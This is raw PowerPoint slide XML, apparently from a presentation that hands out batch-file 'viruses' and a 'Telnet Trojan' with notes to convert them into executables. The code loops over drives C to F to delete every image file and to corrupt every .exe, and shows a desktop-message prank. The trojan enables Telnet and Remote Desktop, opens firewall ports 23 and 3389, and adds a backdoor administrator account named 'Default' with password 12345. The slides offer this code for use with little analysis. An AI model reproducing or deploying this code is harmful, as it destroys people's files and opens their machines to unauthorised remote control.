        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403020428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For loop viruses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>This code creates messages on desktop showing files are corrupted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For /r c:\ %%y in (*.*) do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * %%y   ------  is Corrupted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      it not actually corrupts the file it shows only messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conversion into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is required.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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25061" y="4155311"/>
            <a:ext cx="1770214" cy="1991490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267149077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For loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>viruses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2   (Damage level :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)	</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-274320" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>This code will remove all images, wallpapers from your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Warning!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try it on your own risk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   for /r c:\ %%y in (*.jpg,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,*.gif,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) do del %%y /s/q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   for /r d:\ %%y in (*.jpg,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,*.gif,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) do del %%y /s/q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   for /r e:\ %%y in (*.jpg,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,*.gif,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) do del %%y /s/q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                   for /r f:\ %%y in (*.jpg,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,*.gif,*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) do del %%y /s/q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conversion into exe is required.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312497757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For loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>viruses 3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Damage level :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)		</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>code will corrupt all exe files of your system.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Warning! -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try it on your own risk.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                                                                                                       </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                echo you lost all !!!! &gt;c:\tempero.null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                for /r c:\ %%y in (*.exe) do  copy c:\temporal.null  +  %%y  %%y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                for /r d:\ %%y in (*.exe) do  copy c:\temporal.null  +  %%y  %%y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                for /r e:\ %%y in (*.exe) do  copy c:\temporal.null  +  %%y  %%y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                for /r f:\ %%y in (*.exe) do  copy c:\temporal.null  +  %%y  %%y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                del c:\tempero.null /s/q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conversion into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is required.                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311750375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Telnet Trojan</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088020" y="2556932"/>
            <a:ext cx="9808577" cy="3635524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>as Remote Administrator tool with the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>telnet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tlntsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> start= auto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>net start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tlntsvr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> firewall add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>portopening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> TCP 23 "Telnet"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>termservice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> start= auto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>net start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>termservice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> firewall add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>portopening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> TCP 3389 "Remote Desktop" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>net user Default 12345 /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> administrators Default /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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51566" y="3422194"/>
            <a:ext cx="3264302" cy="2590716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427528512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818476" y="3758494"/>
            <a:ext cx="7489807" cy="1015663"/>
          </a:xfrm>
